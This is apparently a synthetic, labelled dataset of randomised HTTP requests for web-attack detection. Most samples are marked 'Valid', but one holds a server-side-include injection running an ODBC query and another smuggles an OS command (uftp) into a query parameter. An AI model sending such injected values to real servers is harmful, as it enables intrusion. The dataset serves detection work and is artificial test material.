Referer: http://www.TsnsniN.biz/mcd2j/SoeOtue/m5Tme58k/4l5r/tisgu.swf
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 0.6; ej-dr; rv:6.6.5) Gecko/69852851
UA-CPU: MIPS
UA-Disp: 442,791,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 669x1617
Via: 7.9 143.250.217.141, 1.7 www.eglbsics.shtml
Transfer-Encoding: identity
Upgrade: le7/5.5, eimt/4.8
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 5640669966
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jsxo=di nd&zWPNfU.a=ruwsAeuue2seoreht&fssci=5;~~pyU$teX gssi:ly&KijH-LgM@c=Ssecthw0noeTd&4ynt=[fteb0eocunb&c@2UXJ=717&a9esrgsa=7085465909&ptdAemjctavt2a=84840330&ixibntl=ntr;euLrtcangr&s]r&zILMMrb=;t6s(robjecti<ays&es4gjex=6_pnl&I6gcnwaatt=d.@

End - Id: 7823
Start - Id: 18032
class: Valid
GET /oejsp3b0dkttgMtrt8a/0OuLH3z_oU5zh8LX-_HR/s1maP751jWmT5k/etnc3DctjWJNS1eE/ih.VwEAyOCC.nsf? HTTP/1.1
Host: www.ihrrvnrr.com
Connection: nasilt
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: xe7s-t, nuiit-eoaT;q=0.2, l-bbtpk
Cache-Control: no-store
Client-ip: 58.26.203.199
Cookie: eosl=tytild7meeT;eh=aoqbetweenRshpfYectr
Cookie2: $Version="4"
Date: Sun, 06 Dec 09 06:02:42 GMT
ETag: "Y5XVc5vLTuEmHw7jl"
Expect: 100-continue
From: eynace@cr6ubcenn.org
If-Modified-Since: Sat, 03 Jul 04 03:51:18 UTC
If-Unmodified-Since: Tue, 06 Apr 04 01:03:09 CET
If-Match: "yvX_uvxc52FBacEqrNy"
If-None-Match: *
If-Range: *
Max-Forwards: 6019
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic NnNlZ2R0OmlleXRn
Authorization: NTLM bWN1cmVzcG5haWVsbmRmejMwYXVId3RkZTdvZWNyaU9zOGk=
Range: 223-,754-
Referer: http://coee.cz/rErenr.swf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.7 (compatible; le9rtv; Open BSD i586; l42lo; Xeedr)
UA-CPU: PowerPC
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9181x5761
Via: 4.4 219.86.166.170, 8.4 155.173.59.197
Transfer-Encoding: 2Ytw4
Upgrade: mnit2e/4.0, 20vtg/4.8, nef3hy/1.1
Warning: 923 136.21.74.55:3970 "tpeOiltiem" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 9297794233
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18032
Start - Id: 32441
class: Valid
GET /igtoigelrlc/IntotLeaahmlzr9h/ndlsnvdarnmoensbm/iorehselnqTt/qpl5yEHnASh122Yk/HqieRnAXeYK@M/eBo20muSratr6/E3hr/ih.wwn6zg1N/telnetLg8_JvDwnodeunionetc/5h_93cSrdw-xjz7PDJu/eGEA.php3? HTTP/1.1
Host: 12.115.9.158
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: o6-eoCnshl, doio-honlUt;q=0.2
Cache-Control: max-age=6
Client-ip: 251.30.39.27
Cookie: mDN1UI=dBE@q1.;anod9=4726;bTjJEe=pscripto;boE=etdneUaor
Cookie2: $Version="005"
Date: Sun, 21 Jan 07 11:19:51 GMT
ETag: W/"9UxkXmCsfalhKw0D"
Expect: 100-continue
From: oi1hn4@aintRh.uk
If-Modified-Since: Mon, 08 Dec 08 03:23:21 GMT
If-Unmodified-Since: Thu, 06 May 04 12:19:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 978
MIME-Version: 9.5
Pragma: Dd='t'
Proxy-Authorization: et6l beaes2md=oil8eA1
Authorization: Basic dHRtbWg6VEFuRQ==
Range: -5,-8701,-8
Referer: /egs4s.jpeg
TE: chunked;q=0.3
Trailer: Upgrade
User-Agent: q9d9eandh/1.4.2
UA-CPU: PowerPC
UA-Disp: 339,988,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5662x6161
Via: 3.5 www.iscYyvh1.html
Transfer-Encoding: identity
Upgrade: 1o0/3.7, s7dacb/4.7
Warning: 120 www.torwc6.shtml "mpfdt" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 32441
Start - Id: 26041
class: Valid
GET /.28Bwgetbx6bXsystem/lSG9LSt_s0w/i09i6mimscsenudn/ztqpnn.sh?eVj5ovka9otej=vynsil&9c=anvbscriptguby6%3C&E9IcvnevWaa=r+5a+&tsn7ietbe=tXtor&5@GSH6B9NIR=eshhmalodb0zo8&2araeOltggin=%27rhi%7Ce%40positionnu8 HTTP/1.1
Host: www.ptp2ty.ch:80
Connection: 5ttrtpt
Accept: */*
Accept-Charset: shift_jis, x-mac-japanese, x-mac-chinesesimp, euc-cn;q=0.1
Accept-Encoding: *
Accept-Language: taiwe-avEsnn
Cache-Control: only-if-cached
Client-ip: 139.5.255.143
Cookie: el=spositionnvhome twindow.openf;zt=ncEsq?eeen%;Kk2BW=io2yri9sprocessing-instruction ;wUk-rmz0dG-0Lrm=m2Ph4v;techrriOoiw5=Nrtooeti0N;Wuavyeeeesmate=g$f4poswh Hantt
Cookie2: $Version="33"
Date: Thu, 05 Feb 04 05:15:22 GMT
ETag: W/"LvVKcJV9LTc@6otu9"
Expect: 100-continue
From: 3seat2ct@Cn4ntSeii.com
If-Modified-Since: Sat, 12 May 07 01:56:53 UTC
If-Unmodified-Since: Wed, 11 Mar 09 06:51:56 GMT
If-Match: *
If-None-Match: "zRDI.1PE-talCA1PC2h-"
If-Range: "Io@I8bznZ43dkGy"
Max-Forwards: 08
MIME-Version: 4.1
Pragma: E='neh'
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: Digest nonce
Range: 2-,84805-173
Referer: /eeoGeeqi/ifOo.asmx
TE: trailers,chunked,deflate;q=0.4
Trailer: Warning
User-Agent: oghsleesiigeyNaa
UA-CPU: MIPS
UA-Disp: 889,8239,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 096x0326
Via: 8.2 113.163.39.132, 7ra/5.7 3.239.206.149
Transfer-Encoding: compress
Upgrade: ftihA/8.4, ifteSe/6.0, eia7r/1.9
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 235.121.152.157
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26041
Start - Id: 29514
class: Valid
GET /lIb3poedRHj8thteotd/httal/Hhbe-b6i/xieshEhdeimpA3rhqgiv/ralrwoothicrirre5z/3reAhqemVqhSeEesahc/9wdOax/m6V0XR1_9I9JTp/thtH/i2nnesoo8Qa1l/ft0s425.bin?oeot=1&E9U0-=i%2Fwinntcsh&5hfwoTngaoa293=gdecotnefjtdocumentRuL&0d5amlpihmg=cLP0xuV8VNDK&rdsngoihc5r=91211205&ii=israNg+r&3iteAcoiwcerhWe=kzf9&cwsrYaiuRapcjdd=atelnetebetweenNr6odrop%3Fss&Pwindow.opencatj=379426736&toehe=csioe&8Oa2ehu=io%27%26logzieziby&eeoYtAonhiyntn=qn8hsaawenyag&sw9uei=6650734&nSne5e=nstmsrxosturae6 HTTP/1.1
Host: www.waakasbfr.biz:2
Connection: close
Accept: audio/*;q=0.1, image/*;q=0.6, text/plain;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: Ne-8, ipz-enn3nAa;q=0.9, ClcGo-7b, ltr-u;q=0.0, entulNr-n
Cache-Control: r=oosdo
Client-ip: 53.221.31.135
Cookie: rep=telnetrl;wrdshanosa9uin=:h2uvy9oescaY;lhRniitMuhqnEhe=onnlnkioreyEn
Cookie2: $Version="265"
Date: Tue, 20 Jan 04 18:00:16 GMT
ETag: "hgR0jsUgc8FxYqW8"
Expect: 100-continue
From: hSr5h@WteltemeT.com
If-Modified-Since: Mon, 20 Jun 05 17:14:09 GMT
If-Unmodified-Since: Sun, 25 May 08 18:39:00 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Mar 09 23:21:47 UTC
Max-Forwards: 2379
MIME-Version: 6.8
Pragma: egutjpc=o
Proxy-Authorization: Digest algorithm=txrgX
Authorization: mnnn lb0ayd=scEsh
Range: 39-
Referer: http://dyoUhac.gov/weisao/ioneehtc/se3tmns/niht.tiff
TE: deflate;q=0.5,trailers,trailers
Trailer: From
User-Agent: Mozilla/3.5 (X11; U; Linux i386 2.5; ar-cl; rv:0.6.0) Gecko/19374066
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 641x2619
Via: 8.3 67.109.112.168, HTTP/4.7 247.13.39.8
Transfer-Encoding: compress
Upgrade: btsTai/0.7, ltOC/6.6, 3ee/0.5, av5o/8.4
Warning: 280 32.122.51.216 "inirOc7els4yq2p5tEw" 
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 801273405
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29514
Start - Id: 7755
class: Valid
PUT /i@JvmwRqYpP/tiwaat/nFX27/n9sahnEt6h/yJpUDpRg.Maovu/6suecttqSf/haA.html? HTTP/1.0
Content-Length: 100
Content-Language: dehn,epei,tr
Content-Encoding: identity
Content-Location: /eoos/strp.cfm
Content-MD5: Z3NlNjJwdU5ZcmFtaFBzZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Dec 08 15:02:05 GMT
Last-Modified: Fri, 14 Dec 07 11:02:53 CET
Host: www.bttEdm0w.org
Connection: keep-alive
Accept: text/html;q=0.0, video/*;q=0.2
Accept-Charset: x-mac-cyrillic, iso-8859-4, cp-936;q=0.2, windows-1255;q=0.8
Accept-Encoding: deflate;q=0.4, gzip, compress, gzip
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 204.252.123.33
Cookie: 6p5dneia=9044651;hcr5rhhom=aai;BcQo0xWfC=nAzjjZwB5iF;le5t5n9hcgdtIDn=7846
Cookie2: $Version="8"
Date: Thu, 15 Jul 04 23:44:23 CET
ETag: "B0o@_eJH@TkGCu-Nff"
Expect: lsnpOs
From: 9ynn@9e1lsae.st
If-Modified-Since: Sun, 18 May 08 03:45:37 UTC
If-Unmodified-Since: Wed, 05 Aug 09 15:09:29 GMT
If-Match: *
If-None-Match: *
If-Range: "q@6OkcVN@MgRIhHICNj"
Max-Forwards: 7
MIME-Version: 2.6
Pragma: te='etdeeoee'
Proxy-Authorization: Basic bm50aXRjcjpzbzhs
Authorization: wcr7l pneheh=hm30
Range: 42-,574-0,04-96557
Referer: /fseiIsot/wnhrpaHo.php3
TE: trailers,deflate
Trailer: TE
User-Agent: fsphE/0.6.6.5
UA-CPU: PowerPC
UA-Disp: 285,7227,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2784x639
Via: 7.4 103.130.220.10
Transfer-Encoding: bMepEe
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 246.243.72.110
X-Serial-Number: 755834931599886
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hzAas=4&euheei0sUIie=758064857&80%u4=iJ6ThUUB&n0pBiUWmRh=H+jov&ols8dVHbd=933&ywamide=tnhm8wpassthrur

End - Id: 7755
Start - Id: 17776
class: Valid
GET /av_30Co_t6c7/dGWZ/pwEiq/bueeS7spewesirn/tJ8Ywf-bJUeu65ES@/mrhtoi/rn5NH0RB7f/rmim/Lsjua/6jK644u@n/eS-P0PKs_U/4LDl.sw.swf? HTTP/1.0
Host: 0.240.91.54:80
Connection: keep-alive
Accept: image/gif;q=0.4, video/*;q=0.2, video/quicktime;q=0.1
Accept-Charset: iso-2022-kr
Accept-Encoding: gzip, identity, gzip, gzip;q=0.2, compress;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 77.125.92.204
Cookie: xx2stesego=87356;aqecltl=44378;phpform69=25388;uoJeypassthrud@O=s;ihphtrhtiznHys=l%uftuao6 ;ar=azyl-9nH1T
Cookie2: $Version="528"
Date: Thu, 11 Oct 07 10:19:12 UTC
ETag: W/"jqc_0dHQCP@kLLu-jv"
Expect: 100-continue
From: 0D8aoioi@bieedfc.uk
If-Modified-Since: Sat, 13 Jan 07 21:55:19 UTC
If-Unmodified-Since: Sun, 22 Jun 08 21:57:13 GMT
If-Match: *
If-None-Match: "9vOa-UqM-1n4DT@m"
If-Range: Wed, 30 Aug 06 14:12:18 UTC
Max-Forwards: 735
MIME-Version: 3.7
Pragma: Dejiiton=aqkltOo
Proxy-Authorization: Digest opaque="tmvEti"
Authorization: jrama o8Nh=sptasue
Range: 329245-531,569228-311014,-5
Referer: /hatiwjbE/yslyoheu/UnehetEI/TkiAd.conf
TE: deflate,gzip;q=0.5
Trailer: Expect
User-Agent: Mozilla/4.8 (X11; U; SunOS sun4u 6.7; pE-ig; rv:0.8.6) Gecko/91664037
UA-CPU: x86
UA-Disp: 2786,862,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 582x198
Via: 8.6 202.127.31.179, 2.9 187.46.173.127
Transfer-Encoding: deflate
Upgrade: hrjjsa/6.3, slosri/3.8, i8y/4.8, vli8r/7.4
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 197606037
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17776
Start - Id: 40797
class: SSI
GET /gaasNs/nES_RfkxgiC7S4Q_/f7t/EY/oHB2LdxtacDv/jjr0aVallchildD/athmic6goi6eoalv/bte2uSreceoEihaSosnd.dll?tD54cdaelieoh9S=%3C%21--+++%23odbc+connect%3D%22vm4%2Cgctl%2CrTnm%22+++++++statement%3D%22select+++++*++++from++Rguad%22--%3E&eesiaGahglmlTt=0&Tirdalc=18916840&ihmVtecAa=7&isnmrohgo=g5pD&khtrsmonSo3e=esakmnAb+n1m HTTP/1.0
Host: www.ttndEew.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: xhege-l2mw2M
Cache-Control: max-stale
Client-ip: 154.27.72.55
Cookie: 1l1Stieqc=Cdrlt;2ary=l
Cookie2: $Version="344"
Date: Thu, 22 Jan 04 06:39:41 UTC
ETag: "Mkc9ZM08CabKyv1n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 14 May 09 20:47:47 UTC
If-Unmodified-Since: Thu, 26 May 05 19:18:42 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: *
Max-Forwards: 009
MIME-Version: 8.4
Pragma: itipoo='taehhoi9'
Proxy-Authorization: Digest username="easT"
Authorization: Basic dGNjTmlzYTpzcmUzbA==
Range: -473515,10127-9,-129281
Referer: http://www.Elmdhc.ch/oede/yenoisa.png
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: atp4ihewhsreBl
UA-CPU: 68000
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 8812x175
Via: FTP/5.9 58.191.224.182
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: tNdwlL/6.5
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40797
Start - Id: 43317
class: OsCommanding
GET /86mvarbUOHEZ@/9isxPovtullhTjn/cL.c17@/pemfbny/htpass6F4hlognOnnj/jioedroegeeted3mei/aq8eeobzlnhtsugwn9.mdb?0ii2te=%5Cn+++++uftp+++-p+++++www.esri.com+++++%2Fmainro%2Fgeonnstasens%2Froasnd%2Fesmeas%2Fgenstr%2Fin&dinm=U%24kh&Veetnceyr=eLMxFLFU&ku6LDxEvamcK=0156&snwhxibit2hou2E=e6U5&matyneaat=2599&ims=tdNhUx0Iywr&_3RpQ.var6=17796&iroejEtN=26860&hv0tAaISk=iiggaFzb&tUhnSopoas2h=%24t%40s5muhttl&loiriitma9oh=ghauyrs+%3C&ei6hhnq0wu=xiydyEstwnee HTTP/1.1
Host: 39.221.73.52:80
Connection: close
Accept: image/gif, text/html
Accept-Charset: iso-8859-4;q=0.2
Accept-Encoding: compress, deflate, deflate;q=0.2, deflate;q=0.9, deflate;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 170.237.233.234
Cookie: j7fTp3ehs7eQp=zrlees;sncxvhdeur4=6vtlg;ree=tn\J
Cookie2: $Version="3"
Date: Thu, 02 Feb 06 03:46:29 CET
ETag: "40ys2g9rXHb@kzHexja"
Expect: trl2g=ErI0fhr
From: ehhmnsme@ohym.uk
If-Modified-Since: Wed, 29 Jun 05 21:59:07 UTC
If-Unmodified-Since: Mon, 31 Jan 05 03:53:13 UTC
If-Match: *
If-None-Match: "SqtapM8htxOM8Ikn"
If-Range: Fri, 01 Apr 05 02:36:54 CET
Max-Forwards: 5848
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: Digest qop=mokEmOt
Range: 7-25,-90,16289-
Referer: http://www.eOeTao.de/canil/nsevspa.conf
TE: gzip;q=0.6,trailers,trailers
Trailer: Cache-Control
User-Agent: ntsepdtibx (tOy@Rbo; ndNQBbF; tVmoimkS; 2O9RS2e; ncCDGLZ)
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: merhn/0.4 35.246.112.144, HTTP/8.4 www.w2tA.gif, eh4i/3.6 68.90.179.145
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 295019193
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43317
Start - Id: 5803
class: Valid
POST /siiiua6aur/8U8Bwt1L/whmqmegr/rQ/brBphpa7Ew/imuaaarobmzssMo/eeubssanpfifw0thkt/ejea31.d7O.asmx? HTTP/1.1
Content-Length: 290
Content-Language: tc,VsI,sbqv
Content-Encoding: identity
Content-Location: /41aau/dueeqfw/sf2lerao/dsHo.html
Content-MD5: dGg4ZWVmbmFha2k4UmhyOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Sep 07 14:33:00 CET
Last-Modified: Tue, 09 Jun 09 15:52:24 CET
Host: www.oknl02v.ch
Connection: a2tnZ
Accept: audio/x-wav, video/*;q=0.0, image/gif
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2517
Client-ip: 42.172.144.34
Cookie: J.Ff53S7Sro=lka ;iabioel2eQo3brg=/T8tstnteo;oTlnilc9=4;95ltiiuhpEneeO=49431963;bfexecg5Fyv-B=uQyhwe6_EGna;qe1vtaeof=rhOB
Cookie2: $Version="558"
Date: Sun, 21 Dec 08 19:11:14 GMT
ETag: W/"kdXGVOPA-hkDlC8TP"
Expect: nel1=yoolom
From: s8eohuh@Trune.de
If-Modified-Since: Sun, 04 Jan 04 05:01:28 UTC
If-Unmodified-Since: Tue, 02 Dec 08 14:51:43 GMT
If-Match: "_4mr6jC06rcjT7kSD"
If-None-Match: "4cUOa8@87TznGD7v8"
If-Range: *
Max-Forwards: 9
MIME-Version: 2.7
Pragma: kvsmbtcs='creso'
Proxy-Authorization: Basic dXBuY3VkOmhzMW9v
Authorization: 4tlSrt 7iOkg=Lyhs
Range: 741779-46
Referer: http://www.daohNrb2.uk/D0pEzrci/slonn.png
TE: deflate;q=0.0,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.7 (compatible; ii0ieAalnf; Win98; 3sa6Fnraa; ni4tft)
UA-CPU: MIPS
UA-Disp: 746,8790,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 397x323
Via: 5.3 228.109.205.154:161
Transfer-Encoding: deflate
Upgrade: raEat/5.3, am6cih/1.5
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 90.253.102.78
X-Serial-Number: 8692230651
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

nierwfc=ia ;sSstdinupdatecer&baii=wcu&ts6=uNtmpdropentldilzilt%&athtunmfmii=vjauomsmizafd&4sdL3wtyhIal=ente\Geexecl1imgh&emn= nteetrprsx gt&aTFy=ha ii7&ZSg.M=959642&ianatEp=oeoe\&u4ta0t7tggiw7rg=</e7A&TZhtpass.q=ih3reuys ii&cea=measeHeoT8Btfr7iyy&itnaasfeh=etonb nnitdieudeletea

End - Id: 5803
Start - Id: 23342
class: Valid
GET /eyowhunefnSohwa/sJHpphV@OZB/tohunu7tint07mqRhlnp/n2d/tzgNpSrasJ_dWJd/b6BRMz@dv4x/tMz999N3.M/catJg79HuKfQ2/kWO9B2KLdD9l31_Dk.asmx? HTTP/1.0
Host: www.4Fhetnm.org
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-2
Accept-Encoding: compress, identity, compress, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 253.173.161.120
Cookie: alhteett=Xb;l9dgootn=t;toebl=sEsjPhIp7.kC;eNkosmoron=i10MkQVjNkFL
Cookie2: $Version="209"
Date: Fri, 28 Aug 09 09:06:55 UTC
ETag: "eVACl-3mNGn-FXqEH"
Expect: 100-continue
From: eriitwao@Q9ma4lnlsr.net
If-Modified-Since: Wed, 12 Sep 07 21:18:44 GMT
If-Unmodified-Since: Thu, 18 Sep 08 13:19:39 UTC
If-Match: "s0s_Y9lIl8-@A.fn0"
If-None-Match: "fnTOSv.bmJlc7PM"
If-Range: "i7TQvnTlR0q9BZ6pl"
Max-Forwards: 1
MIME-Version: 8.7
Pragma: gl=th8t
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: Basic bHBwMWRzcjpmZWEwcno=
Range: 65870-,-7
Referer: /oss8tt/eujd9mtn/vdnnt/entit/emud.css
TE: chunked
Trailer: Warning
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 7.4; tf-dG; rv:2.0.7) Gecko/53013208
UA-CPU: Sparc
UA-Disp: 7895,7420,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2011x4796
Via: 5.3 www.sbedEu.css
Transfer-Encoding: gzip
Upgrade: djbm1/8.1, yti/6.3, troL/1.6, aze4re/4.7
Warning: 540 www.9nihi.shtml "atshrnedTnhbRumoe1eN" "Wed, 12 Oct 05 05:44:09 CET"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23342
Start - Id: 20633
class: Valid
GET /gAyPg/h3hNcn7oTgeSo.cgi?7flrhaiA1os1t=EbeCamrup&ses6yTnhob8on=7429&Ftd5in7nc=80233&vento7nUOxgt=%5C3inmmlfmetajitde%40&eiw=nriecho%29&oh@Glexecu=91612&iienb=63494&elaizuxdm=rN1&waiet8n=passwdl&iEAn=120&asa=shutdownx&ama7S=91 HTTP/1.0
Host: www.sKmuhIad.biz
Connection: cuep
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: 
Accept-Language: meeR-n;q=0.6, 7ei-uy, mfrhiayn-isec0Eba;q=0.9, s-shdi
Cache-Control: max-stale
Client-ip: 131.102.16.251
Cookie: aoa8swatouogoW=:|au
Cookie2: $Version="808"
Date: Sat, 11 Oct 08 12:35:20 UTC
ETag: W/"QQN@YXWgga92S2wdoJd"
Expect: zhcapaa=4SySOen;myedr=9rlpRete
From: hims9lO@pelsineh9.it
If-Modified-Since: Wed, 21 Nov 07 05:59:10 GMT
If-Unmodified-Since: Fri, 02 Oct 09 09:47:33 GMT
If-Match: "nYAEr32hViLib2CDiR5k"
If-None-Match: *
If-Range: Thu, 15 Jan 04 13:31:23 UTC
Max-Forwards: 878
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Digest realm
Range: 30982-
Referer: http://www.tdhni.uk/siRtun/oihte/y2F5oseR/hsexea.gif
TE: deflate;q=0.6
Trailer: Date
User-Agent: pafhmvdNt/1.6
UA-CPU: 68000
UA-Disp: 626,4432,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3710x9582
Via: HTTP/6.3 www.sfhsaa.png, 9.2 www.t7gs1.tiff, uhrs/0.9 238.161.1.77
Transfer-Encoding: Mtinu
Upgrade: lka/1.6
Warning: 860 www.Pz9Tes.png "csrehlretdegSt" "Wed, 24 Jun 09 06:42:44 UTC"
X-Forwarded-For: 240.52.92.34
X-Serial-Number: 999844116491308
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20633
Start - Id: 4688
class: Valid
PUT /tjehj41aHZXq@L7F7/seidtR85zuneh/oz9jfPFPAZPMJnesJ_8/yDD4/kAgtt/un2lMo/xao6asaTrTs.sh? HTTP/1.1
Content-Length: 141
Content-Language: h5rd,7p,qsghtyfs
Content-Encoding: gzip
Content-Location: http://www.deIwlwhh.st/8etctr0a/hrsod/ea5n.gif
Content-MD5: dGRlaWhhdWRpb3J1YXVjaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Sep 04 01:09:50 UTC
Last-Modified: Thu, 05 Feb 04 04:06:01 GMT
Host: www.estkaI.de:80
Connection: keep-alive
Accept: application/rtf;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: na-iabodf;q=0.0
Cache-Control: no-store
Client-ip: 134.20.236.30
Cookie: i6Wh1oe07es=eehilhhlystcom4
Cookie2: $Version="35"
Date: Wed, 04 Feb 09 02:43:46 UTC
ETag: W/"kVT7Vesw7UeCe2hepcn"
Expect: vcIl=8ncdDto;ieieu7t
From: esfJRi@1on3oes.be
If-Modified-Since: Sat, 07 Nov 09 10:16:32 CET
If-Unmodified-Since: Thu, 26 Apr 07 14:27:01 UTC
If-Match: *
If-None-Match: *
If-Range: "uupiVj3R-47AGTkQo"
Max-Forwards: 733
MIME-Version: 6.6
Pragma: gdwo='e'
Proxy-Authorization: 1sso Eodpor=eor82e
Authorization: Digest algorithm=p7tlcq
Range: 511-,489649-576168,-523
Referer: /vehsmr/6seac/sitoh1Ee.php4
TE: chunked,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/6.9 (Windows; U; Win98 3.7; oH-T0; rv:1.1.9) Gecko/14232331
UA-CPU: 68000
UA-Disp: 199,143,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5828x404
Via: gtfp/7.3 www.0sgl.htm
Transfer-Encoding: deflate
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 263274968971
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

a4dndfo3kpraai=ereswhYiadknio1r&cnaaera7z=5640712&9epi7e4n1ia=0070&MtUe6ryon=es&atam5ebh=Wlieg>Eoc+&isotgt=22&er6s=81580&.adminBlQfd=hyda

End - Id: 4688
Start - Id: 1646
class: Valid
GET /dttaalhorwSo/fsystemF0Qkh_kea8ncphp/e683zLrYJzRzRm7N-/rietcei/rskHH4hBqdg.f6b/kY5tGjq1t5KJpk7Iz/l_h9Orj1DghH2/sYCcX6aP/t8Sendrhni/aRXmRBMwg0n_l/wyy_BoptP64CTg/nS2tB.bMFb-3CxySR.tiff?a1lmhrlni0f=gt3tserETzv4r&ol9ribmkT8fy=i.EGF%40wLP&B8OE=28 HTTP/1.1
Host: 14.134.103.234:3
Connection: esymrmeo
Accept: application/*, video/quicktime, audio/x-wav;q=0.5
Accept-Charset: windows-1257, windows-1251, cp-936, iso-8859-3;q=0.9, macintosh
Accept-Encoding: *;q=0.1
Accept-Language: 0NjLaz7a-tiwbhiy, it-ha;q=0.9, ir-pls9i2el
Cache-Control: min-fresh=2272
Client-ip: 233.154.243.51
Cookie: rfahiezo=tclspleiAliarg2iMa;islvuc7=likepasswd istdinl ;retwahehr8rq2sm=u6TiV6NJ;tdycrdrBorh=]nnodei;Y-O-H=sP3Rt;grdhfh=1teoa
Cookie2: $Version="1"
Date: Sun, 02 Mar 08 07:17:22 GMT
ETag: "hnb.G_M4W3GdT9L4bXGP"
Expect: hnxtayv
From: S6tD@nser.com
If-Modified-Since: Sun, 27 Aug 06 01:10:25 GMT
If-Unmodified-Since: Sun, 13 May 07 06:00:03 CET
